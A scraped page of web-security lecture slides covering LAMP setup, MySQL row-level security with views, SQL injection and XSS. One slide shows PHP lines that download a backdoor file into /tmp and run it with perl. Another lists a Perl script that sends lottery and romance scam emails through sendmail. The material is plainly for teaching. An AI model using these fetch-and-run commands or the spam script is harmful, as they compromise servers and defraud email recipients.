Web Security Chien-Chung Shen Introduction Web security addresses the issues that are specific to –how web servers present their content.

Slides:



Advertisements
Similar presentations
PHP I.
Advertisements

PHP II Interacting with Database Data. The whole idea of a database-driven website is to enable the content of the site to reside in a database, and to.
MySQL Access Privilege System
1.  Understanding about How to Working with Server Side Scripting using PHP Framework (CodeIgniter) 2.
1 Configuring Internet- related services (April 22, 2015) © Abdou Illia, Spring 2015.
WebGoat & WebScarab “What is computer security for $1000 Alex?”
Server-Side vs. Client-Side Scripting Languages
1 Chapter 12 Working With Access 2000 on the Internet.
PHP (2) – Functions, Arrays, Databases, and sessions.
B.Sc. Multimedia ComputingMedia Technologies Database Technologies.
Creating WordPress Websites. Creating a site on your computer Local server Local WordPress installation Setting Up Dreamweaver.
Chapter Apache Installation in Linux- Mandrake. Acknowledgment The following information has been obtained directly from
Apache : Installation, Configuration, Basic Security Presented by, Sandeep K Thopucherela, ECE Department.
PHP Scripts HTML Forms Two-tier Software Architecture PHP Tools.
Chapter 6: Hostile Code Guide to Computer Network Security.
8/17/2015CS346 PHP1 Module 1 Introduction to PHP.
Linux Operations and Administration
Form Handling, Validation and Functions. Form Handling Forms are a graphical user interfaces (GUIs) that enables the interaction between users and servers.
DAT602 Database Application Development Lecture 15 Java Server Pages Part 1.
Sys Prog & Scripting - HW Univ1 Systems Programming & Scripting Lecture 15: PHP Introduction.
Lecture 3 – Data Storage with XML+AJAX and MySQL+socket.io
PHP Tutorials 02 Olarik Surinta Management Information System Faculty of Informatics.
Reading Data in Web Pages tMyn1 Reading Data in Web Pages A very common application of PHP is to have an HTML form gather information from a website's.
Session 5: Working with MySQL iNET Academy Open Source Web Development.
MySQL in PHP – Page 1 of 17CSCI 2910 – Client/Server-Side Programming CSCI 2910 Client/Server-Side Programming Topic: MySQL in PHP Reading: Williams &
INTERNET APPLICATION DEVELOPMENT For More visit:
PHP Programming with MySQL Slide 8-1 CHAPTER 8 Working with Databases and MySQL.
An introduction to Apache. Different Types of Web Servers Apache is the default web server for may Unix servers. IIS is Microsoft’s default web server.
INTERNET APPLICATION DEVELOPMENT For More visit:
1 PHP and MySQL. 2 Topics  Querying Data with PHP  User-Driven Querying  Writing Data with PHP and MySQL PHP and MySQL.
5 Chapter Five Web Servers. 5 Chapter Objectives Learn about the Microsoft Personal Web Server Software Learn how to improve Web site performance Learn.
Robinson_CIS_285_2005 HTML FORMS CIS 285 Winter_2005 Instructor: Mary Robinson.
Python CGI programming
10/5/2015CS346 PHP1 Module 1 Introduction to PHP.
Web Server Administration Chapter 7 Installing and Testing a Programming Environment.
Chapter 7 Working with Databases and MySQL PHP Programming with MySQL 2 nd Edition.
FTP Server and FTP Commands By Nanda Ganesan, Ph.D. © Nanda Ganesan, All Rights Reserved.
1 Working with MS SQL Server Textbook Chapter 14.
ITN Wake Tech1 ITN270 Advanced Internet Databases Lecture 15. General MySQL Administration Topics: –Securing a New MySQL Installation –MySQL Server.
Installing and Using MySQL and phpMyAdmin. Last Time... Installing Apache server Installing PHP Running basic PHP scripts on the server Not necessary.
Creating Dynamic Web Pages Using PHP and MySQL CS 320.
NMED 3850 A Advanced Online Design January 12, 2010 V. Mahadevan.
Introduction to CS520/CS596_026 Lecture Two Gordon Tian Fall 2015.
Variables and ConstantstMyn1 Variables and Constants PHP stands for: ”PHP: Hypertext Preprocessor”, and it is a server-side programming language. Special.
CGI Common Gateway Interface. CGI is the scheme to interface other programs to the Web Server.
Open Source Server Side Scripting ECA 236 Open Source Server Side Scripting PHP & MySQL.
Java server pages. A JSP file basically contains HTML, but with embedded JSP tags with snippets of Java code inside them. A JSP file basically contains.
Introduction to JavaScript CS101 Introduction to Computing.
Table of Contents TopicSlide Administrator Login 2 Administrator Navigations 3 Managing AlternativeDr.com Blogs 4 Managing Dr. Lloyd May Blogs 5 Managing.
David Lawrence 7/8/091Intro. to PHP -- David Lawrence.
Creating a simple database This shows you how to set up a database using PHPMyAdmin (installed with WAMP)
Security Issues with PHP  PHP installation  PHP programming Willa Zhu & Eugene Burger.
8 Chapter Eight Server-side Scripts. 8 Chapter Objectives Create dynamic Web pages that retrieve and display database data using Active Server Pages Process.
FTP COMMANDS OBJECTIVES. General overview. Introduction to FTP server. Types of FTP users. FTP commands examples. FTP commands in action (example of use).
IS2803 Developing Multimedia Applications for Business (Part 2) Lecture 2: Introduction to IS2803 Rob Gleasure
Dr. Abdullah Almutairi Spring PHP is a server scripting language, and a powerful tool for making dynamic and interactive Web pages. PHP is a widely-used,
LINUXCHIX WEBMAIL. Software run by an ISP or online service that provides access to send, receive, and review using only your Web browser. Users.
Software-Projekt 2008 Seminarvortrag“Short tutorial of MySql“ Wei Chen Verena Honsel.
Building Your Own Website Using:. Install & configure LAMP. Download WordPress and run it as a local website on your Raspberry Pi. Configure WordPress.
Chapter 7: Using Network Clients The Complete Guide To Linux System Administration.
COM621: Advanced Interactive Web Development Lecture 10 PHP and MySQL.
9/21/04 James Gallagher Server Installation and Testing: Hands-on ● Install the CGI server with the HDF and FreeForm handlers ● Link data so the server.
L.A.M.P. İlker Korkmaz & Kaya Oğuz CS 350. Why cover a lecture on LAMP? ● Job Opportunities – There are many hosting companies offering LAMP as a web.
Introduction to Dynamic Web Programming
Chapter 19 PHP Part III Credits: Parts of the slides are based on slides created by textbook authors, P.J. Deitel and H. M. Deitel by Prentice Hall ©
Chapter 8 Working with Databases and MySQL
Configuring Internet-related services
Tutorial 6 PHP & MySQL Li Xu
Web Application Development Using PHP
Presentation transcript:

Web Security Chien-Chung Shen

Introduction Web security addresses the issues that are specific to –how web servers present their content to web browsers –how the browsers interact with the servers –how people interact with the browsers From static contents to dynamic contents from web server –Static – related to access control of disk files –Dynamic – e.g., alter advertisements in content depending on what can be guessed about geographical location and personal preferences of the visitor Dynamic content creation frequently requires that the web server be connected to a database server –information that is dished out dynamically is placed in the database server –need mechanism/tool that can analyze the URL received from a visitor’s browser and any other available information on the visitor, decide what to fetch from the database for the request at hand, and then compose a web page to be sent back to the visitor That mechanism/tool is PHP scripts (or ASP for Microsoft) –especially for open-source Apache web server and MySQL database backend

Install Apache, PHP5, & MySQL Install LAMP (Linux, Apache, MySQL, and PHP) on Ubuntu How to install LAMP on Ubuntu To automatically resize windows in Ubuntu VM $ sudo apt-get install virtualbox-guest-dkms virtualbox-guest-utils virtualbox-guest-x11

Install and Configure Apache2 (1) To make sure that your Apache2 web server is running, point your browser to the URL –Browser displays default “ It Works! ” page ( /var/www/index.html ) Check that your web server is running by executing ps aux | grep apache Every once in a while you may have to change the config file for the web server. When you do that, you’d need to reload your new configuration into the server –“Graceful” way is to run /etc/init.d/apache2 reload as root –Run /etc/init.d/apache2 restart to restart the server at which point it would automatically load in the new configuration Main configuration file for Apache2 HTTPD server is /etc/apache2/apache2.conf, which pulls in more site- specific config information from the files in the directories sites-enabled and modes-enabled

Install and Configure Apache2 (2) Directories mode-available and modes-enabled –Before you can use any of the directives in config files, you have to first enable the modules that correspond to those directives –For example, must enable module “ userdir ” before inserting the “ UserDir ” directive in config files Enable a module by executing a2enmod and disable a module by a2dismod –a2enmod userdir // enable userdir module Place the following directives in apache2.conf file if your web content is going to be in a directory called cshen and its subdirectories that may be named public-web or public_html UserDir enabled cshen UserDir public-web public_html

Install and Configure Apache2 (3) Get the web server to dish out the pages that may reside in the different accounts on your Ubuntu machine –The directory that holds the magic to accessing the different accounts for web content is /etc/apache2/sites-available/ $ cd /etc/apache2/sites-available $ cp 000-default.conf cshen.conf Inserted the following element into cshen.conf : Options Indexes FollowSymLinks MultiViews AllowOverride None Require all granted Go back to directory /etc/apache2/ and enable the cshen “virtual server” $ a2ensite cshen This creates a symbolic link from directory sites-enabled to directory sites-available for the cshen site

Install and Configure Apache2 (4) If web pages being served out by Apache2 invoke CGI scripts, you have to tell the server how to find them Assume CGI scripts are in my own directory Include in cshen.conf file in the sites-available directory the following directives AllowOverride None Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch Require all granted Reload the new configuration by $ service apache2 reload

Introduction to PHP Recursive acronym for “PHP: Hypertext Preprocessor” –GNU for GNU's Not Unix Most popular server-side scripting language for generating dynamic content for web pages –Excellent language support for interacting with practically all commonly-used databases – – How PHP runs on your machine is determined by the php.ini file

PHP’s System Program Execution Function exec : for executing an external program on the server that can fill an array with the different lines of output produced by program execution passthru : for running external programs in a way that is similar to exec and system but more suitable for the programs that produce binary data that is meant to be sent back to the browser system : that works much like system() function in Perl shell-exec : that works in the same way as the backticks operator in Perl Since these functions execute programs on the server, they must be kept outside the reach of intruders

Sample PHP Exploit <?php passthru(’cd /tmp;wget data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*’); passthru(’cd /tmp;curl -O /data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*’); system(’cd /tmp;wget backdoor.txt;rm -f backdoor.txt*’); system(’cd /tmp;curl -O backdoor.txt;rm -f backdoor.txt*’); exec(’cd /tmp;wget data/backdoor.txt;rm -f backdoor.txt*’); exec(’cd /tmp;curl -O data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*’); shell_exec(’cd /tmp;wget backdoor.txt;rm -f backdoor.txt*’); shell_exec(’cd /tmp;curl -O backdoor.txt;rm -f backdoor.txt*’); ?> Attacker is trying for the server to download from some third party a file called backdoor.txt that presumably contains malicious code –the malicious code could open an IRC channel for command and control

PHP Exploit to Spew out Spam (1) Unethical provider of web hosting services wants to inject some PHP code into web pages uploaded to his server by unsuspecting clients He knows that the injected PHP code will NOT be visible to a client even when the client views the page source in his/her browser because, by design, PHP is parsed out before it is sent to a browser. So, to the client, the web page will look exactly like it was uploaded Cause a spam file to be quietly downloaded from a third-party spam mail provider whenever a client page is viewed; the spam file consists of the addresses and the content for each address in the form of print() commands to an output stream that talks to the sendmail program running on the server

PHP Exploit to Spew out Spam (2) Configuration Web Hosting Service Provider: –IP: –OS: Ubuntu –Web server: Apache2 –MTA: sendmail Innocent Client: –IP: –OS: Max OS X –Web browser: Firefox list provider: –

PHP5 Installation Install PHP5-CLI package CLI may locate syntax errors in PHP scripts by simply using ‘ php -l yourscript.php ’ The CLI executable php is installed in /usr/bin/ Inside /etc/apache2/mods-enabled, edit php5.conf by adding SetHandler application/x-httpd-php after SetHandler application/x-httpd-php Enable application of PHP preprocessor to regular html files as well Ordinarily, web server would invoke the PHP preprocessor only on the files that end in “.php ”, “.php5 ”, etc.

Spam File Executable by Perl open SENDMAIL, "|/usr/sbin/sendmail -t -oi "; print SENDMAIL "From: \n"; print SENDMAIL "To: \n"; print SENDMAIL "Subject: I am so lonely, please call \n\n"; print SENDMAIL "\n\nYou may not believe this, but I know you already."; print SENDMAIL "I promise you will not regret it if you call me at \n"; print SENDMAIL "\n\nIf you call, I will send you my photo that you will drool over. Call soon.\n"; print SENDMAIL "\n\n"; close SENDMAIL; open SENDMAIL, "|/usr/sbin/sendmail -t -oi "; print SENDMAIL "From: \n"; print SENDMAIL "To: \n"; print SENDMAIL "Subject: you just won a lottery \n\n"; print SENDMAIL "\n\nYes, you have won loads of money.\n\n"; print SENDMAIL "\n\nYou can now have fun the rest of your life.\n\n"; print SENDMAIL "\n\n Call immediately at to claim your prize.\n\n"; print SENDMAIL "\n\n"; close SENDMAIL;

Uploaded Web Page Uses.. to uploading a file (web page) by the element This element causes the form to display “Browse” button that the user can use to locate the file that he/she wants to upload to web server Page calls on uploadfile.php for the “Submit” action on the form –this “.php ” file at the web server contains PHP code Upload page: UploadYourWebPage.html Filename for your web page: // “Browse” button

Upload Page

MySQL with Row-Level Security MySQL database with row-level security serving as a backend to Apache web server –a user is only allowed to access (and, possibly, modify) certain designated rows of a database table –e.g., customer account information in a bank is stored in one or more database tables. When a client logs in remotely to see his/her bank balance, bank restricts that customer to just those rows of the table that contain information specific to that customer’s account at the bank Example MySQL setup –user: Manager –database name: Manager_db –table name: Maintenance_Schedule Example table | operator_name | equipment | deadline | | Operator1 | Engine parts | | | Operator2 | Transmission | |

MySQL with Row-Level Security Three accounts: operator1, operator2, operator3 When any of these three individuals accesses Manager_db database, especially its Maintenance_Schedule table, each operator is able to view only his/her own row and no other rows

MySQL Installation (1) Server executable: /usr/sbin/mysqld Command-line shell executable: /usr/bin/mysql Command-line database administration utility: /usr/bin/mysqladmin -u : database root -p : prompt for password To check server is running: $ mysqladmin -u root -p ping To check version: $ mysqladmin -u root –p version To change password: $ mysqladmin -u root –p password xyz To check status: $ mysqladmin -u root –p status To shutdown: $ mysqladmin -u root –p shutdown To start: $ /usr/bin/mysqld_safe --user=root & Config files are inside /etc/mysql/, with most of config information in /etc/mysql/my.cnf

MySQL Installation (2) Set up account: Manager –Setting up a new account means entering information in user table of mysql database that comes preinstalled with the database system –Fire up mysql shell: /usr/bin/mysql -u root -p –Print out contents of all the rows, but only the columns Host and User, from the user table of mysql database mysql> select User, Host from mysql.user; | User | Host | | root | | | root | ::1 | | debian-sys-maint | localhost | | root | localhost | | root | wheatgrass | rows in set (0.00 sec) –User account in MySQL is always identified by a combination The host entry means that user username will only be allowed to connect with the database from that host If a user is allowed to connect from anywhere, the host entry in the second column for such a user is expressed by the symbol % So the 4 root accounts are different, even though the usernames for all three are the same and the hosts for all three accounts are on the same machine

MySQL Installation (3) mysql> show databases; mysql> show tables in mysql; –These tables are for maintenance of database system and with documentation Ask shell to switch to mysql database, followed by request to list columns of user table of mysql database mysql> use mysql; mysql> describe user; –system is capable of storing 42 different attributes for a database account –attributes that end in the suffix ‘ _priv ’ stand for privileges that you may either authorize or deny for the individual accounts create a new database as Manager_db and then create a new user account Manager with full access to the database mysql> create database Manager_db; mysql> create user mysql> set password for = PASSWORD( ’xxxxxxxx’ ); mysql> grant all on Manager_db.* to mysql> show grants for

MySQL Installation (4) Call to PASSWORD( ’xxxxxx’ ), with actual password between single or double quotes, creates an encrypted password. If you don’t mind the password being stored in clear text, create a new new account by mysql> create user identified by ’xxxxxx’; In the syntax used above, we limited Manager ’s access to MySQL from localhost. To let Manager connect from anywhere (obviously a risky thing to do), use mysql> create user If you just say mysql> create user Manager; the default of ’, where % is wildcard, is assumed anyway for the host for account Manager It is also possible to create a new account by invoking SQL command INSERT to directly insert new account information in user table of mysql database. In this case, you must also invoke the flush privileges; statement for the newly entered information to take effect

MySQL Installation (5) To revoke privileges granted to Manager mysql> revoke all on Manager_db.* from Revoking all privileges does not mean dropping the account because user, host information continues to stay in mysql.user table To completely drop Manager account that was created previously mysql> drop user As you are experimenting with MySQL, you will occasionally run into a need to delete a previously created table for a database mysql> drop table if exists ; But if only want to empty out a previously created table, mysql> delete from ; Log into database as root to change password associated with Manager account mysql> update mysql.user set password = PASSWORD(’xxxxx’) where user = ’root’; mysql> flush privileges;

MySQL Installation (6) Change the datatype of a field in table mysql> alter change ; Place SQL commands in an ordinary text file and then execute the file in a batch mode through the mysql shell mysql> source myFileWithSql.txt There is no terminating semicolon on this statement When using a text file in this manner, make sure that the first statement in the file is ’use ; ’ for the database for which the SQL statements are meant for To see all accounts that are currently in the system mysql> select user.User from user;

MySQL Installation (7) Place a table in this database mysql> use Manager_db; mysql> create table Maintenance_Schedule ( operator_name char(20) -> primary key not null, equipment char(20), deadline Date ); mysql> show tables; mysql> insert into Maintenance_Schedule values ( ’Operator1’, ’Engine parts’, ’ ’ ); mysql> insert into Maintenance_Schedule values ( ’Operator2’, ’Transmission’, ’ ’ ); mysql> insert into Maintenance_Schedule values ( ’Operator3’, ’Wheels’, ’ ’ ); mysql> select * from Maintenance_Schedule; mysql> create user Operator1; mysql> create user Operator2; mysql> create user Operator3; mysql> set password for Operator1 = PASSWORD( ’operator1’ ); mysql> set password for Operator2 = PASSWORD( ’operator2’ ); mysql> set password for Operator3 = PASSWORD( ’operator3’ );

MySQL Installation (8) We did not specify the hosts for the three Operator accounts. So MySQL will use the default ‘ % ’ for them, implying that they will be able to connect from anywhere To find out which database you are currently examining select database(); To find out what you are logged in as select user(); To find out what version of MySQL you are running select version(); To find out all users select User from mysql.user;

Row-Level Security (1) Row level security in MySQL is implemented with the help of views In general, a view in MySQL is a result table that would ordinarily be returned by a query such as select but with the difference that the result table exhibits persistence –a view is a persistent result table Create a view Operator_view mysql> create view Operator_view as select * from Maintenance_Schedule where operator_name = mysql> grant select on Operator_view to Operator1; mysql> grant select on Operator_view to Operator2; mysql> grant select on Operator_view to Operator3; mysql> quit;

Row-Level Security (2) mysql> create view Operator_view as select * from Maintenance_Schedule -> where operator_name = user() : built-in function returns the user currently logged into MySQL substring_index() : built-in function that returns a substring from its first-argument string by using the second argument substring as a delimiter and the third argument integer as the number of substrings to return assuming there are multiple occurrences of the delimiter –if user() returns call to substring_index() returns just string Operator1 Have Operator2 invoke mysql shell /usr/bin/mysql -u Operator2 -p mysql> use Manager_db; mysql> show tables; mysql> select * from Maintenance_Schedule; mysql> select * from Operator_view;

PHP + MySQL Web servers that create web pages dynamically frequently require access to backend databases and not uncommonly this database is MySQL Review how a PHP enabled web server works in conjunction with MySQL database management system PHP script makes a direct connection with MySQL database through mysql_connect() function call. Subsequently, PHP script feeds SQL to database through mysql_query() function calls and retrieves results through the $row associative array variable element MySQL user name: MySQL user password:

SQL Injection Attack When visitor clicked the “Submit” button of the form, that caused his/her browser to send the following URL back to server hosting MySQL database r2&password=operator2 For this URL, what is retrieved from MySQL database is just that row of Maintenance_Schedule table that corresponds to Operator2 This URL is sent back to server in clear text and is therefore visible to anyone carrying out traffic surveillance between where Operator2 is located and where server is installed So it would not be so difficult for an adversary to mount an attack on the server for different possible values for user and the password fields A major enabler of SQL injection attack was the use of GET method for form submission With GET method for form submission, all of the form fields become a part of the URL that is sent back to the web server More complex cases of the same could cause stored procedures to be injected into a database and to be subsequently executed

Cross-site Scripting (XSS) Attacks PHP stores various attributes of the uploaded file in predefined variable $_FILES When a file is uploaded, PHP stores it initially at a temporary location accessed by $_FILES["file"][”tmp_name"] Creates another file that is identical to what the client uploaded except for the extra PHP code that is in the statement that ends in line (P) [Firefox: tool -> Web Developer -> Page source] An intruder broke into the server at the web hosting service, and wrote a simple script that would scan all HTML files at the server and inject malicious code into HTML files in the manner presented Folks whose HTML web pages would be corrupted in this manner would never suspect that anything was twisted with their pages Cross-site scripting (XSS) attack with server-side injection of malicious code